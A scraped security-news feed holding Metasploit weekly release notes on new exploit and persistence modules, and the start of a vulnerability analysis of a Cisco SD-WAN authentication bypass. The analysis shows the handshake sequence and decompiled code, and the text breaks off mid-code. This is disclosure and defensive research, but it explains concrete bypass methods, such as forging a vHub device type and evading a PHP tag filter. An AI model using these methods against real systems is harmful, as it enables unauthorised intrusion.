src="https://cdn-images-1.medium.com/max/1024/1*7hj3_pVkFN0f5pRiVm_gkw.png"></figure><h4>Thanks for reading.</h4><p>Hope this walkthrough helped you solve the room and follow the exploitation process clearly.</p><p>If you enjoyed this walkthrough, you can check out more rooms and labs here:<br><a href="https://github.com/Esther7171/TryHackMe-Walkthroughs/blob/main/Room/Poster/Readme.md?utm_source=chatgpt.com"><em>Esther7171 TryHackMe Walkthroughs</em></a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=1e89381212c9" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/poster-tryhackme-walkthrough-postgresql-exploitation-privilege-escalation-1e89381212c9">Poster TryHackMe Walkthrough | PostgreSQL Exploitation &amp; Privilege Escalation</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap Up 05/22/2026]]></title>
<description><![CDATA[Another week, another authentication bypassOur humble Metasploit weekly(ish) blog has been blessed with a new network component vulnerability. The dynamic duo of @sfewer-r7 and @jburgess-r7 have discovered and authored the admin/networking/cisco_sdwan_vhub_auth_bypass module for CVE-2026-20182, a...]]></description>
<link>https://tsecurity.de/de/3540618/it-security-nachrichten/metasploit-wrap-up-05222026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3540618/it-security-nachrichten/metasploit-wrap-up-05222026/</guid>
<pubDate>Fri, 22 May 2026 21:38:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Another week, another authentication bypass</h2><p>Our humble Metasploit weekly(ish) blog has been blessed with a new network component vulnerability. The dynamic duo of @sfewer-r7 and @jburgess-r7 have discovered and authored the admin/networking/cisco_sdwan_vhub_auth_bypass module for CVE-2026-20182, a vulnerability gracing the Cisco Catalyst SD-WAN Controller. The devices, whose purpose is to control a software-defined (SD) wide-area-network (WAN) was unfortunately missing an extra A for authentication. An oversight that Cisco has duly patched.</p><p>Elsewhere this week, the HUSTOJ online judge platform has been caught failing to judge its own zip files (CVE-2026-24479), courtesy of a zip-slip RCE module from LoTuS and friends. Next, @Alpenlol has weaponized the small matter of Barracuda's Email Security Gateway, happily eval()-ing the number format string inside an attached Excel file (CVE-2023-7102).</p><p>Our own @jburgess-r7 has been rather busy and also contributed a cPanel/WHM authentication bypass module that escalates straight to root via CRLF injection (CVE-2026-41940). And last, but not least, @h00die has gifted us a post module for Tenable Security Center that quietly extracts and cracks its stored credential hashes. Nevertheless, this module works only if your Tenable Security Center is using the same password you have been using since 2006.</p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1c00ca29a0dc49d8/6a0f585f6125c63de7ca60ff/A_train_hitting_a_school_bus.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="A_train_hitting_a_school_bus.png" asset-alt="A_train_hitting_a_school_bus.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1c00ca29a0dc49d8/6a0f585f6125c63de7ca60ff/A_train_hitting_a_school_bus.png" data-sys-asset-uid="blt1c00ca29a0dc49d8" data-sys-asset-filename="A_train_hitting_a_school_bus.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A_train_hitting_a_school_bus.png" sys-style-type="display"></figure><p></p><h2>New module content (5)</h2><h3>Cisco Catalyst SD-WAN Controller vHub Authentication Bypass</h3><p>Authors: Crypto-Cat and sfewer-r7</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21463">#21463</a> contributed by <a href="https://github.com/jburgess-r7">jburgess-r7</a></p><p>Path: admin/networking/cisco_sdwan_vhub_auth_bypass</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-20182&amp;referrer=blog">CVE-2026-20182</a></p><p>Description: This adds a new auxiliary module for CVE-2026-20182, an authentication bypass in the Cisco Catalyst SD-WAN Controller.</p><h3>HUSTOJ Admin users can zip-slip problem_import_qduoj.php, planting PHP files in webroot for RCE</h3><p>Authors: LoTuS and friends, ling101w, and oxagast</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21165">#21165</a> contributed by <a href="https://github.com/oxagast">oxagast</a></p><p>Path: linux/http/hustoj_problem_import_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-24479&amp;referrer=blog">CVE-2026-24479</a></p><p>Description: This adds an exploit for CVE-2026-24479 which is a zip slip vulnerability in HustOJ, an open source online judge platform, prior to version 26.01.24.</p><h3>Barracuda ESG Spreadsheet::ParseExcel Arbitrary Code Execution</h3><p>Authors: Curt Hyvarinen, Mandiant, and haile01</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21035">#21035</a> contributed by <a href="https://github.com/Alpenlol">Alpenlol</a></p><p>Path: linux/smtp/barracuda_esg_spreadsheet_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2023-7101&amp;referrer=blog">CVE-2023-7101</a></p><p>Description: Adds a new exploit module for CVE-2023-7102, an unauthenticated remote code execution vulnerability in Barracuda Email Security Gateway (ESG) appliances. The flaw resides in the Amavis scanner's use of the Perl Spreadsheet::ParseExcel library, which allows eval injection via malicious Excel number format strings. The module uses Rex::OLE to craft a minimal BIFF8 XLS file with the payload embedded in a FORMAT record and delivers it via SMTP.</p><h3>cPanel/WHM CRLF Injection Authentication Bypass RCE</h3><p>Authors: Adam Kues, Crypto-Cat, Shubham Shah, and Sina Kheirkhah</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21417">#21417</a> contributed by <a href="https://github.com/jburgess-r7">jburgess-r7</a></p><p>Path: multi/http/cpanel_whm_auth_bypass_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-41940&amp;referrer=blog">CVE-2026-41940</a></p><p>Description: This adds an exploit module for cPanel/WHM authentication bypass leading to root RCE (CVE-2026-41940).</p><h3>Tenable Security Center</h3><p>Author: h00die</p><p>Type: Post</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21177">#21177</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: linux/gather/tenable_security_center</p><p>Description: This adds a linux post module for Tenable Security Center that will retrieve credential hashes and crack them.</p><h2>Enhancements and features (6)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21292">#21292</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Updates the RPC notes command to allow data to return a hash value were applicable.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21305">#21305</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Updates the services RPC endpoint to additionally report the resource and parent services fields.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21414">#21414</a> from <a href="https://github.com/dledda-r7">dledda-r7</a> - This backports the Python components of the Copy Fail (CVE-2026-31431) exploit to work with Python 2.7 interpreters, effectively supporting older targets.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21447">#21447</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - This updates Metasploit's documentation to describe how a kerberoast attack can be performed entirely with Metasploit. It also updates the kerberoast module to correctly log the realm to the database regardless of if an existing LDAP session was used or not.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21458">#21458</a> from <a href="https://github.com/dwelch-r7">dwelch-r7</a> - Updates the Sinatra, Rack, and Thin web service dependencies to support an upcoming Rails 8 upgrade.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21460">#21460</a> from <a href="https://github.com/bhaskarbhar">bhaskarbhar</a> - This consolidates some code used by Windows exec payloads to provide a more consistent experience.</li></ul><h2>Bugs fixed (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21285">#21285</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Updates the RPC creds command to now also return the associated realm key and value.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21345">#21345</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This fixes an issue in the smb_enumshares module that prevented it from working against certain SMB 1 targets such as Metasploitable 2.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21474">#21474</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a crash in msfdb init on Windows.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21475">#21475</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fix msfdb installation error on windows.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-05-14T12%3A44%3A22Z..2026-05-19T23%3A45%3A14Z%22">Pull Requests 6.4.133...6.4.134</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.133...6.4.134">Full diff 6.4.133...6.4.134</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-7373 | Rapid7 Metasploit Pro 5.0.0 metasploitPostgreSQL Service postgres.exe inclusion of functionality from untrusted control sphere]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Rapid7 Metasploit Pro 5.0.0. This affects an unknown function of the file postgres.exe of the component metasploitPostgreSQL Service. This manipulation causes inclusion of functionality from untrusted control sphere.

This vulne...]]></description>
<link>https://tsecurity.de/de/3535034/sicherheitsluecken/cve-2026-7373-rapid7-metasploit-pro-500-metasploitpostgresql-service-postgresexe-inclusion-of-functionality-from-untrusted-control-sphere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3535034/sicherheitsluecken/cve-2026-7373-rapid7-metasploit-pro-500-metasploitpostgresql-service-postgresexe-inclusion-of-functionality-from-untrusted-control-sphere/</guid>
<pubDate>Thu, 21 May 2026 06:35:15 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/rapid7:metasploit_pro">Rapid7 Metasploit Pro 5.0.0</a>. This affects an unknown function of the file <em>postgres.exe</em> of the component <em>metasploitPostgreSQL Service</em>. This manipulation causes inclusion of functionality from untrusted control sphere.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-7373">CVE-2026-7373</a>. It is possible to launch the attack on the local host. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Mandalorian and Grogu rezensiert: Schau da, eine Star-Wars-Referenz! - Golem.de]]></title>
<description><![CDATA[... Data Analyst (TÜV) · zum Kurs. Exklusiv: IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning. E-Learning: Exklusiv: IT-Security ...]]></description>
<link>https://tsecurity.de/de/3531763/it-security-nachrichten/the-mandalorian-and-grogu-rezensiert-schau-da-eine-star-wars-referenz-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3531763/it-security-nachrichten/the-mandalorian-and-grogu-rezensiert-schau-da-eine-star-wars-referenz-golemde/</guid>
<pubDate>Wed, 20 May 2026 08:22:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... Data Analyst (TÜV) · zum Kurs. Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E-Learning. E-Learning: Exklusiv: <b>IT</b>-<b>Security</b> ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Wildtierabwehr: Wolfsroboter gegen Bärenangriffe werden knapp - Golem.de]]></title>
<description><![CDATA[... IT Strategy & Execution. Karriere Ratgeber: TechRiders Summit – Europas ... Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning ...]]></description>
<link>https://tsecurity.de/de/3520919/it-security-nachrichten/wildtierabwehr-wolfsroboter-gegen-baerenangriffe-werden-knapp-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3520919/it-security-nachrichten/wildtierabwehr-wolfsroboter-gegen-baerenangriffe-werden-knapp-golemde/</guid>
<pubDate>Sat, 16 May 2026 00:22:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>IT</b> Strategy &amp; Execution. Karriere Ratgeber: TechRiders Summit – Europas ... <b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E-Learning ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 05/15/2026]]></title>
<description><![CDATA[Weaponizing a text editor for fun and profitGather round, dear readers, because today, we (by we, we mean @h00die) dropped the ultimate persistence mechanism: Vim plugin persistence. And honestly, calling it "persistence" feels redundant — Vim is already the most persistent thing ever. Somewhere,...]]></description>
<link>https://tsecurity.de/de/3520684/it-security-nachrichten/metasploit-wrap-up-05152026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3520684/it-security-nachrichten/metasploit-wrap-up-05152026/</guid>
<pubDate>Fri, 15 May 2026 21:22:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p></p><h2>Weaponizing a text editor for fun and profit</h2><p>Gather round, dear readers, because today, we (by we, we mean @h00die) dropped the ultimate persistence mechanism: Vim plugin persistence. And honestly, calling it "persistence" feels redundant — Vim is already the most persistent thing ever. Somewhere, somehow, there will still be a Vim session open since 2011, because no one has figured out how to close it. So we are not so much establishing a foothold here as we are joining an existing hostage situation.</p><p>Elsewhere this week, Marvell's QConvergeConsole has been caught handing arbitrary files to unauthenticated visitors, as is tradition (CVE-2025-6793), GestioIP 3.5.7 ships an upload handler, so trusting it will cheerfully let an admin overwrite the handler with a backdoor and then dutifully execute it (CVE-2024-48760). And of course, we can't forget about Dolibarr ERP/CRM, which blocks PHP injections by checking — and we cannot stress this enough — by searching for string &lt;?php. So @M4nu02 brought an elaborate module which changes &lt;?php to &lt;?PHP in the payload to successfully bypass this mitigation (CVE-2023-30253). Truly a wonderful time to be alive.</p><h2></h2><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt80fb065b3abb4a91/6a076d2ec9bda18363c9f093/vim-meme.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="vim-meme.png" asset-alt="vim-meme.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt80fb065b3abb4a91/6a076d2ec9bda18363c9f093/vim-meme.png" data-sys-asset-uid="blt80fb065b3abb4a91" data-sys-asset-filename="vim-meme.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="vim-meme.png" sys-style-type="display"></figure><h2>New module content (4)</h2><h3>Marvell QConvergeConsole Path Traversal (CVE-2025-6793)</h3><p>Authors: Michael Heinzl and rgod</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21322">#21322</a> contributed by <a href="https://github.com/h4x-x0r">h4x-x0r</a></p><p>Path: gather/qconvergeconsole_traversal</p><p>CVE reference: ZDI-25-450</p><p>Description: This adds a new auxiliary module that exploits a path traversal vulnerability (CVE-2025-6793) in Marvell QConvergeConsole to read arbitrary files from the target host. Marvell QConvergeConsole versions 5.5.0.85 and earlier are vulnerable, and no authentication is required to exploit the issue.</p><h3>VIM Plugin Persistence</h3><p>Author: h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21206">#21206</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: linux/persistence/vim_plugin</p><p>Description: This adds a new Linux persistence module, which establishes persistence by writing a Vim plugin to the target user's ~/.vim/plugin/ directory. The next time that user launches Vim, the plugin executes the configured payload and opens a new session as that user.</p><h3>GestioIP 3.5.7 Remote Command Execution</h3><p>Authors: maxibelino and odeez24</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21041">#21041</a> contributed by <a href="https://github.com/Odeez24">Odeez24</a></p><p>Path: multi/http/gestioip_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2024-48760&amp;referrer=blog">CVE-2024-48760</a></p><p>Description: This adds an exploit module for an authenticated remote code execution vulnerability in GestioIP 3.5.7 (CVE-2024-48760). An attacker with admin credentials can abuse the unsafe upload handler at /api/upload.cgi to overwrite the script itself with a backdoor, which is then invoked to execute attacker-supplied commands.</p><h3>Dolibarr ERP/CRM Authenticated Code Injection</h3><p>Authors: Emanuele Cervelli and Tinexta Cyber Offensive Security Team</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21362">#21362</a> contributed by <a href="https://github.com/M4nu02">M4nu02</a></p><p>Path: unix/http/dolibarr_cms_rce_cve_2023_30253</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2023-30253&amp;referrer=blog">CVE-2023-30253</a></p><p>Description: This adds a new exploit module for Dolibarr ERP/CRM (CVE-2023-30253), an authenticated PHP code injection vulnerability affecting versions before 17.0.1. The module abuses the Website module to inject a payload that bypasses Dolibarr's PHP tag filter by using uppercase &lt;?PHP tags instead of the filtered lowercase form. Valid credentials with access to the Website module are required.</p><h2>Enhancements and features (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20617">#20617</a> from <a href="https://github.com/Aaditya1273">Aaditya1273</a> - Adds an OptArray datastore option type to the framework. Previously multi valued datastore options were usually input as comma separated strings, now Metasploit devs have the option to use OptArray.</li></ul><h2>Bugs fixed (0)</h2><p>None</p><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-05-08T17%3A05%3A58%2B01%3A00..2026-05-14T12%3A44%3A22Z%22">Pull Requests 6.4.132...6.4.133</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.132...6.4.133">Full diff 6.4.132...6.4.133</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-20182: Critical authentication bypass in Cisco Catalyst SD-WAN Controller (FIXED)]]></title>
<description><![CDATA[OverviewWhile researching a critical authentication bypass vulnerability, CVE-2026-20127, which was exploited in-the-wild, Rapid7 Labs discovered a new authentication bypass vulnerability affecting Cisco Catalyst SD-WAN Controller (formerly known as vSmart), CVE-2026-20182.This new authentication...]]></description>
<link>https://tsecurity.de/de/3517279/it-security-nachrichten/cve-2026-20182-critical-authentication-bypass-in-cisco-catalyst-sd-wan-controller-fixed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3517279/it-security-nachrichten/cve-2026-20182-critical-authentication-bypass-in-cisco-catalyst-sd-wan-controller-fixed/</guid>
<pubDate>Thu, 14 May 2026 18:06:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Overview</h2><p><span>While researching a critical authentication bypass vulnerability, </span><a href="https://www.rapid7.com/blog/post/etr-critical-cisco-catalyst-vulnerability-exploited-in-the-wild-cve-2026-20127" target="_self"><span>CVE-2026-20127</span></a><span>, which was </span><a href="https://blog.talosintelligence.com/uat-8616-sd-wan/" target="_blank"><span>exploited in-the-wild</span></a><span>, </span><a href="https://www.rapid7.com/research" target="_self"><span>Rapid7 Labs</span></a><span> discovered a new authentication bypass vulnerability affecting Cisco Catalyst SD-WAN Controller (formerly known as vSmart), </span><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW" target="_blank"><span>CVE-2026-20182</span></a><span>.</span></p><p><span>This new authentication bypass vulnerability affects the “vdaemon” service over DTLS (UDP port 12346), which is the same service that was vulnerable to CVE-2026-20127. The new vulnerability is not a patch bypass of CVE-2026-20127. It is a different issue located in a similar part of the “vdaemon” networking stack.</span></p><p><span>This impact however is the same,</span><span><strong> a remote unauthenticated attacker can leverage CVE-2026-20182 to become an authenticated peer of the target appliance, and perform privileged operations</strong></span><span>, such as injecting an attacker controlled public key into the </span><span><span data-type="inlineCode">vmanage-admin</span></span><span> user account’s authorized SSH keys file. Once this has been performed, a remote unauthenticated attacker can login to the NETCONF service (SSH over TCP port 830) as the </span><span><span data-type="inlineCode">vmanage-admin</span></span><span> user, and begin to issue arbitrary NETCONF commands.</span></p><p><span>CVE-2026-20182 has a CVSSv3.1 score of </span><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank"><span>10.0</span></a><span> (Critical), and a Common Weakness Enumeration (CWE) of </span><a href="https://cwe.mitre.org/data/definitions/287.html" target="_blank"><span>CWE-287</span></a><span>: Improper Authentication.</span></p><h2>Technical analysis</h2><p><span>The Cisco Catalyst SD-WAN Controller serves as the central control plane. Unlike Cisco Catalyst SD-WAN Manager, it has no web UI. Its network-reachable attack surface is narrow and depending on the configuration may expose the following ports:</span></p><p><span></span></p><table><colgroup data-width="852"><col><col><col></colgroup><tbody><tr><td><p><span><strong>Port</strong></span></p></td><td><p><span><strong>Protocol</strong></span></p></td><td><p><span><strong>Service</strong></span></p></td></tr><tr><td><p><span>22</span></p></td><td><p><span>TCP</span></p></td><td><p><span>SSH (OpenSSH)</span></p></td></tr><tr><td><p><span>830</span></p></td><td><p><span>TCP</span></p></td><td><p><span>NETCONF over SSH</span></p></td></tr><tr><td><p><span>12346</span></p></td><td><p><span>UDP</span></p></td><td><p><span>vdaemon DTLS control plane</span></p></td></tr></tbody></table><p>⠀</p><p><span>UDP port 12346 is the DTLS-over-UDP control-plane peering port used by vdaemon for inter-controller and controller-to-edge communication. It carries Overlay Management Protocol (OMP) messages including route advertisements, Transport Locations (TLOC) tables, and peer state - the entirety of the SD-WAN overlay routing fabric. Compromising this service means compromising the network.</span></p><p><span>To understand the vulnerability, we first need to understand how vdaemon authenticates control-plane peers. The protocol is a multi-phase handshake over DTLS:</span></p><p><span></span></p><pre language="html">Attacker                                    vSmart
   |                                           |
   |──── DTLS Handshake (any cert) ───────────&gt;|  ← cert verify logs error but returns OK
   |                                           |
   |&lt;──── CHALLENGE (msg_type=8) ──────────────│  ← 256 random bytes + TLVs
   |                                           |
   |──── CHALLENGE_ACK (msg_type=9) ──────────&gt;|  ← device_type=2 (vHub) → NO VERIFICATION
   |                                           |
   |&lt;──── CHALLENGE_ACK_ACK (msg_type=10) ─────│  ← peer-&gt;authenticated = 1
   |                                           |
   |──── Hello (msg_type=5) ──────────────────&gt;|  ← passes auth check, peer goes UP
   |                                           |
   |&lt;──── Hello (msg_type=5) ──────────────────│  ← peer-type:vhub, new-state:up</pre><p>⠀</p><p><span>After a DTLS handshake completes (which accepts any client certificate), the server sends a </span><span><span data-type="inlineCode">CHALLENGE</span></span><span> containing 256 random bytes and a set of TLVs including Certificate Authority (CA) RSA public key components. The client must respond with a </span><span><span data-type="inlineCode">CHALLENGE_ACK</span></span><span>, and it is during the processing of this response, in </span><span><span data-type="inlineCode">vbond_proc_challenge_ack()</span></span><span>, that device-type-specific certificate verification occurs. Or, in the case of a “vHub” device, does not occur.</span></p><p><span>The 12-byte message header format for the vdaemon protocol is as follows:</span></p><p></p><table><colgroup data-width="1179.7564102564102"><col><col><col><col></colgroup><tbody><tr><td><p><span><strong>Byte Offset </strong></span></p></td><td><p><span><strong>Byte Size </strong></span></p></td><td><p><span><strong>Field</strong></span></p></td><td><p><span><strong>Notes</strong></span></p></td></tr><tr><td><p><span>0</span></p></td><td><p><span>1</span></p></td><td><p><span>msg_type</span></p></td><td><p><span>Low nibble = type, high nibble = version</span></p></td></tr><tr><td><p><span>1</span></p></td><td><p><span>1</span></p></td><td><p><span>device_info</span></p></td><td><p><span>High nibble = device_type, low nibble = flags</span></p></td></tr><tr><td><p><span>2</span></p></td><td><p><span>1</span></p></td><td><p><span>flags</span></p></td><td><p><span>Standard value of 0xA0</span></p></td></tr><tr><td><p><span>3</span></p></td><td><p><span>1</span></p></td><td><p><span>padding</span></p></td><td><p><span>Always 0x00</span></p></td></tr><tr><td><p><span>4 - 7</span></p></td><td><p><span>4</span></p></td><td><p><span>domain_id</span></p></td><td><p><span>Big-endian uint32</span></p></td></tr><tr><td><p><span>8 - 11</span></p></td><td><p><span>4</span></p></td><td><p><span>site_id</span></p></td><td><p><span>Big-endian uint32</span></p></td></tr></tbody></table><p>⠀</p><p><span>The vdaemon protocol defines the following device types, encoded in the upper nibble of header byte 1, aka </span><span><span data-type="inlineCode">device_info</span></span><span>:</span></p><p></p><table><colgroup data-width="750"><col><col><col></colgroup><tbody><tr><td><p><span><strong>Value</strong></span></p></td><td><p><span><strong>Device Type</strong></span></p></td><td><p><span><strong>Role</strong></span></p></td></tr><tr><td><p><span>1</span></p></td><td><p><span>vEdge</span></p></td><td><p><span>Data-plane router</span></p></td></tr><tr><td><p><span>2</span></p></td><td><p><span>vHub</span></p></td><td><p><span>Hub router</span></p></td></tr><tr><td><p><span>3</span></p></td><td><p><span>vSmart</span></p></td><td><p><span>Control-plane controller</span></p></td></tr><tr><td><p><span>4</span></p></td><td><p><span>vBond</span></p></td><td><p><span>Orchestrator (trust anchor)</span></p></td></tr><tr><td><p><span>5</span></p></td><td><p><span>vManage</span></p></td><td><p><span>Management plane</span></p></td></tr><tr><td><p><span>6</span></p></td><td><p><span>ZTP</span></p></td><td><p><span>Zero-touch provisioning</span></p></td></tr></tbody></table><p>⠀</p><p><span>This is the core of the vulnerability. Below is a walk through of the decompiled code from </span><span><span data-type="inlineCode">vbond_proc_challenge_ack()</span></span><span>, which processes the </span><span><span data-type="inlineCode">CHALLENGE_ACK</span></span><span> message sent by a connecting peer. After the DTLS handshake, the function extracts the peer's certificate serial number and then enters device-type-specific verification (Note: edited for brevity):</span></p><p>⠀</p><pre language="cpp">// vdaemon!vbond_proc_challenge_ack()
// After extracting serial number from peer certificate via
// X509_get_serialNumber() / ASN1_INTEGER_to_BN() / BN_bn2hex()

// ...snip...

if ( *(_DWORD *)(a3 + 8) == 3 || *(_DWORD *)(a3 + 8) == 5 ) // &lt;--- [1]
{
// vSmart (type 3) or vManage (type 5): Certificate chain verification
v24 = is_serial_duplicate(v22, *(_DWORD *)(a3 + 8), ...);
if ( v24 )
    {
if ( (unsigned __int8)vbond_peer_dup_check(a1, a2, v24, ...) ) // &lt;--- [2]
{
            v19 = 36;  // ERR: Duplicate Serial
goto LABEL_179;  // REJECT
}
    }
}
// ...snip...

// Second verification block - additional cert &amp; state checks
if ( *(_DWORD *)(a3 + 8) == 3 &amp;&amp; *(_DWORD *)(a1 + 8) == 3 // &lt;--- [3]
|| *(_DWORD *)(a3 + 8) == 5 &amp;&amp; *(_DWORD *)(a1 + 8) == 3
|| *(_DWORD *)(a3 + 8) == 5 &amp;&amp; *(_DWORD *)(a1 + 8) == 5
|| *(_DWORD *)(a3 + 8) == 5 &amp;&amp; *(_DWORD *)(a1 + 8) == 4
|| *(_DWORD *)(a3 + 8) == 3 &amp;&amp; *(_DWORD *)(a1 + 8) == 4 )
{
    v19 = vdaemon_dtls_verify_peer_cert(a2);  // Full certificate verification
if ( v19 )
        v18 = 0;
    vdaemon_send_challenge_ack_ack(a1, *(_QWORD *)(a2 + 1232), a2, v18);
if ( v18 != 1 )
goto LABEL_179;  // REJECT on verification failure
vbond_send_ssh_keys_to_vmanage_peer(a1, a2);
}

if ( *(_DWORD *)(a3 + 8) == 1 // &lt;--- [4]
&amp;&amp; (dword_2A1A28 == 4 || dword_2A1A28 == 3 || dword_2A1A28 == 5) )
{
// vEdge (type 1): Hardware/virtual edge certificate verification
    // ... challenge signature, board ID, OTP verification ...
if ( vdaemon_verify_peer_bidcert(a2, ...) )
goto LABEL_179;  // REJECT on failure
}

// *** NO CODE PATH FOR device_type == 2 (vHub) *** // &lt;--- [5]

*(_BYTE *)(a2 + 70) = 1;   // peer-&gt;authenticated = true // &lt;--- [6]
